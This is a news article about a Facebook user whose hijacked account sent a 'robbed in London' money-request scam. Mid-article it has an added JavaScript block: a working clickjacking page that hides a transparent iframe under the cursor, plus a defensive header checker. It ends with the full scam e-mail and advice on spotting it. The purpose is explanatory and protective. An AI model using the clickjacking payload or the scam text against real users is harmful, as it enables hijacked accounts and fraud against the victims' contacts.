
Victor DeRubeis didn’t know he’d been robbed at gunpoint in London until friends started text-messaging offers of help.

It didn’t take long for the freelance journalist to realize that his e-mail account had been hacked through his Facebook page. Like thousands of other Web victims before him, his Internet life was no longer his own.

“I’ve heard of it happening from other people, but this is the first time anything like this has happened to me,” the Weymouth, Mass., resident said Tuesday.

The e-mail, sent to dozens of people in DeRubeis’ address book, says he is “stuck in London with family right now, we came down here on family vacation, we were robbed, worse of it is that bags, cash and cards and our cell phone were stolen at a GUN POINT, and it's hard to get hold of a phone here in London.” The e-mail makes a plea for money to help return his family home.

His nasty surprise had a happy ending – his identity wasn’t stolen, and none of his friends lost money to the scam. Facebook shut down his page for two days and purged a program that had infiltrated his page.

Facebook has devoted a lot of attention to its privacy policy in recent months amid a controversy about how it was sharing information from users like DeRubeis.

But for all that, Internet privacy experts say DeRubeis may be no better protected today than he was Saturday, because the way social network sites like Facebook run leaves them chronically vulnerable.

At the Electronic Frontier Foundation, an Internet civil liberties and privacy advocacy group, senior technologist Peter Eckersley said any social site like Facebook is prone to hacking because “Like” and permission buttons and connections are such a basic part of how they operate.

“This is a well-understood problem,” he said. “It’s up to the Web sites to stop it from happening.”

While social network sites are vulnerable, Eckersley said, Google’s Gmail is comparatively secure.

Facebook didn’t tell DeRubeis exactly how the hackers got to his e-mail, but Eckersley thinks he knows.

A wave of “click-jacker” worms attacked Facebook last week. Click-jackers take advantage of sites with sharing and permission options by loading the site’s own permission button in a frame that is invisible or too small to see, and moving that frame under the Facebook user’s mouse cursor so that an ordinary click lands on it.

As a result, “you click the ‘OK’ on something you don’t even see,” Eckersley said.
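The mechanics Eckersley describes, as an added example that is not code from the article, from Facebook or from the EFF: the first part is a constructed attacker page that keeps a transparent frame under the visitor’s pointer (the framed URL `https://target.example/allow?app=placeholder` is a placeholder, not a real endpoint); the second part is the check a site operator would run against their own response headers to learn whether a third-party page can frame them at all. The sample headers at the bottom are constructed, not captured from any real site.

```javascript
// --- Attacker side -------------------------------------------------------
// A constructed page as a string. The iframe is fully transparent and is
// moved under the pointer on every mousemove, so whatever the visitor
// thinks they are clicking, the click lands on the framed button.
const CLICKJACK_PAGE = `<!doctype html>
<html><body>
<p>Click anywhere to continue</p>
<iframe id="bait" src="https://target.example/allow?app=placeholder"
        style="position:absolute;opacity:0;width:60px;height:25px;border:0;"></iframe>
<script>
document.addEventListener('mousemove', function (e) {
  var f = document.getElementById('bait');
  f.style.left = (e.pageX - 30) + 'px';  // centre the framed button
  f.style.top  = (e.pageY - 12) + 'px';  // under the cursor
});
</script>
</body></html>`;

// --- Defender side -------------------------------------------------------
// Parse a response's headers (names case-insensitive) and decide whether
// an arbitrary origin could load the page in a frame. A CSP frame-ancestors
// directive takes precedence over X-Frame-Options when both are present.
function framingProtection(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  const csp = h['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map(s => s.trim())
      .find(s => /^frame-ancestors\b/i.test(s));
    if (directive !== undefined) {
      const sources = directive.split(/\s+/).slice(1)
        .map(s => s.replace(/^'|'$/g, '').toLowerCase());
      // '*' or a bare scheme such as "https:" admits any origin of that scheme.
      const open = sources.some(s => s === '*' || s === 'https:' || s === 'http:');
      return open
        ? { framable: true, reason: 'frame-ancestors admits any origin' }
        : { framable: false, reason: 'frame-ancestors ' + (sources.join(' ') || "'none'") };
    }
  }

  const xfo = h['x-frame-options'];
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY' || v === 'SAMEORIGIN') {
      return { framable: false, reason: 'X-Frame-Options ' + v };
    }
    // ALLOW-FROM was never supported by Chrome or Safari and was dropped by
    // Firefox; an unrecognised value is ignored, leaving the page framable.
    return { framable: true, reason: 'X-Frame-Options value not enforced: ' + v };
  }

  return { framable: true, reason: 'no framing restriction' };
}

// Constructed sample headers, not captured from any real site.
const SAMPLES = {
  unprotected: { 'Content-Type': 'text/html' },
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  cspNone: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  obsoleteAllowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  cspWins: { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' },
};

for (const [name, headers] of Object.entries(SAMPLES)) {
  const r = framingProtection(headers);
  console.log(`${name.padEnd(18)} framable=${r.framable} (${r.reason})`);
}
```

The `cspWins` sample is the case that trips people up: a `DENY` header does nothing once a `frame-ancestors *` directive is present, because browsers that understand CSP ignore X-Frame-Options when both are set. Sites that rely on `ALLOW-FROM` are in the same position as sites with no header at all.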

DeRubeis suspected his trouble had something to do with a third-party site – in his case, a connection to DailyMile.com, a social site for fitness enthusiasts.

Soon after he posted an update Saturday afternoon, “I started getting text message and phone calls from people who said, ‘Are you in London?’” he said.

He quickly saw that the responses were coming from people in his e-mail address book. He changed his password, sent out warning messages and then waited through “Facebook purgatory” for two days until his account was clear.

DeRubeis has no plans to take down his Facebook page, but he’s using more privacy settings than before.

Eckersley says the best thing most users can do is disable “instant personalization,” which lets partner sites draw on a member’s profile information, and limit the amount of personal material that’s posted.

“Don’t put anything on Facebook (and other social sites) that you aren’t comfortable seeing published,” he said. “Security isn’t good enough to protect very private information, and probably won’t be in the future, so ... be cautious about how you use it.”

Lane Lambert may be reached at llambert@ledger.com.


This e-mail was sent by hackers to people in Victor DeRubeis' address book.

Subject: URGENT HELP!!!

I'm sorry for this odd request because it might get to you too urgent but it's because of the situation of things right now, I'm stuck in London with family right now, we came down here on family vacation, we were robbed, worse of it is that bags, cash and cards and our cell phone were stolen at a GUN POINT, and it's hard to get hold of a phone here in London it's such a crazy experience for us, we need help flying back home, the authorities are not being 100% supportive but the good thing is we still have our passport but don't have enough money to get our flight ticket back home, please i need you to loan us some money, will pay you back as soon as we are back home, i promise.

It is easy to spot as a fake:

- Its phrasing is in the broken English typical of spam e-mails (“it might get to you too urgent but it’s because of the situation of things right now”).
- The situation is implausible (he can’t find a phone, but he can find a computer to send this e-mail? Robbers took everything except their passports?).
- It isn’t personalized (the e-mail includes general details but no specific details about the situation).
- It’s an obvious plea for cash instead of any other help (“please i need you to loan us some money”).

If you receive an e-mail like this from someone you know, always be cautious: confirm whether it’s fake or genuine by phone or another channel you already have for that person, not by replying to the e-mail, before sending anything.